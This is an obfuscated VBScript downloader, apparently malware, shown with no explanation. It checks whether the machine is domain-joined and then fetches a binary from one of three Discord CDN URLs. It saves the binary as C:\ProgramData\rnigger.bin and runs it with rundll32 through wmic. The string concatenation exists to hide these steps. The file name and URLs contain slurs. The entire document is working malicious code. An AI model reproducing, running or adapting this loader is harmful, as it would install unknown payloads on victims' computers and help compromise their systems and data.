Function qXZjpAAEBwRLoG()
hRuVfcYlWzY = "wmi" & "c " & Chr(112) & Chr(114) & Chr(111) & "ce" & "ss " & "ca" & Chr(108) & Chr(108) & " cr" & "ea" & "te " & "" & Chr(34) & "run" & "dl" & "" & "l32" & ".ex" & Chr(101) & " C:" & "\\" & "Pr" & "ogr" & Chr(97) & "mD" & "at" & Chr(97) & "\r" & "" & Chr(110) & "igg" & "er" & ".bi" & "" & "n G" & Chr(101) & "tXM" & "LOb" & "jec" & Chr(116) & Chr(34)
seUbHDfFaQpD = "" & "" & Chr(87) & "scr" & Chr(105) & "pt." & "" & "" & "" & "" & Chr(83) & "hel" & Chr(108)
Set RmRrwoFiErHKiK = CreateObject(seUbHDfFaQpD)
RmRrwoFiErHKiK.Exec(hRuVfcYlWzY)
End Function
Function GgmtPRiNiQDmkOvb(BcbYHZWjkaxTArifr)
If Len(BcbYHZWjkaxTArifr.ResponseBody)>2000 And BcbYHZWjkaxTArifr.Status = 200  Then
    Set AvbiTjMJexYS = CreateObject(Chr(65) & "" & "DOD" & "" & Chr(66) & "" & ".S" & "tr" & "ea" & "" & "" & Chr(109))
    AvbiTjMJexYS.type = 1
    AvbiTjMJexYS.open
    AvbiTjMJexYS.write XRGNWDwYFxz.responseBody 
    AvbiTjMJexYS.savetofile Chr(67) & ":\" & "\P" & Chr(114) & "og" & "ram" & "" & "Da" & "" & "ta" & "\r" & "" & "" & Chr(110) & Chr(105) & "" & "gg" & "er." & Chr(98) & "in", 2
    AvbiTjMJexYS.close
    GgmtPRiNiQDmkOvb = 1
Else
    GgmtPRiNiQDmkOvb = 0
End If

End Function
Set XRGNWDwYFxz = CreateObject("" & "MSX" & "ML2" & "" & "" & ".Se" & "" & Chr(114) & "ve" & "rX" & "" & "ML" & "HTT" & "P.6" & ".0")
jjHeZqLlQXzpr = Chr(87) & "sc" & "ri" & "" & "pt." & "" & "Sh" & Chr(101) & "ll" & ""
Set YeUPHVKbfKGflmG = CreateObject(jjHeZqLlQXzpr)
nuwcRslnhegL = LCase(YeUPHVKbfKGflmG.expandenvironmentstrings("%USERDOMAIN%"))
UcKCnOWDHjURjTYz =LCase(Replace(YeUPHVKbfKGflmG.expandenvironmentstrings("%LOGONSERVER%"), CHR(92+1-1+1-1), ""))
Set YuTZjKZXYgqkOKUaE = CreateObject("Scr" & "ipt" & "in" & "g.F" & "il" & "" & "" & Chr(101) & Chr(83) & Chr(121) & "ste" & Chr(109) & "" & "" & "" & "" & "Obj" & "ec" & Chr(116))
If UcKCnOWDHjURjTYz <> nuwcRslnhegL Then 
For Each BgcDtaOYgVbwBY in Array(Chr(104) & Chr(116) & "" & "tps" & ":/" & "/cd" & Chr(110) & ".di" & "sco" & Chr(114) & "da" & "pp." & "" & "com" & "/at" & "ta" & Chr(99) & "hme" & "nt" & "s/" & Chr(57) & "11" & Chr(50) & "55" & "82" & Chr(53) & "308" & "34" & "84" & "" & "39/" & "917" & "344" & Chr(53) & Chr(53) & Chr(53) & Chr(51) & Chr(55) & "90" & Chr(56) & "54" & Chr(48) & "2/" & "efr" & "XXw" & Chr(104) & "at" & "su" & "pmo" & "the" & "rf" & "uck" & "er" & "s." & "" & "bi" & Chr(110) , "htt" & "ps:" & "//c" & "dn." & "dis" & "co" & "rda" & "pp" & Chr(46) & "co" & "m/" & Chr(97) & Chr(116) & "" & "" & Chr(116) & "" & "" & Chr(97) & "chm" & Chr(101) & "nts" & "/91" & Chr(49) & Chr(50) & "55" & "82" & "530" & Chr(56) & "348" & "43" & "9/9" & "17" & Chr(51) & "44" & "562" & "35" & "422" & "10" & "" & "86/" & "bfu" & "grK" & "hVw" & "hat" & "sup" & "mot" & "her" & "fuc" & "" & "ker" & "s." & Chr(98) & "in" , "htt" & "ps" & "://" & Chr(99) & "dn" & ".d" & "isc" & "or" & Chr(100) & "ap" & "p." & Chr(99) & "om/" & "att" & "ac" & "hm" & "" & "" & Chr(101) & "nts" & "/9" & "11" & "255" & "" & "82" & Chr(53) & Chr(51) & "083" & "48" & "43" & Chr(57) & "/9" & "17" & "344" & Chr(53) & "68" & "" & "125" & "56" & Chr(50) & Chr(56) & Chr(57) & Chr(48) & "/Gu" & "JP" & "Zwm" & "Nij" & "Uw" & Chr(104) & Chr(97) & Chr(116) & Chr(115) & "up" & "" & Chr(109) & "ot" & Chr(104) & "erf" & "uck" & "er" & "s.b" & "in") 
    If Not YuTZjKZXYgqkOKUaE.FileExists("C:" & "\\" & "Pro" & "gr" & "amD" & "" & "ata" & Chr(92) & "rn" & "" & Chr(105) & "gg" & "er." & "" & "" & Chr(98) & "in" & "") Then
    XRGNWDwYFxz.Open "GE" & Chr(84) & "" & "" & "" & "" & "" & "", BgcDtaOYgVbwBY, False 
    XRGNWDwYFxz.Send
    hXaHnNSnXW = GgmtPRiNiQDmkOvb(XRGNWDwYFxz)
    If hXaHnNSnXW = 1 Then
    qXZjpAAEBwRLoG()
    Exit For
    End If
    End If
Next
End If
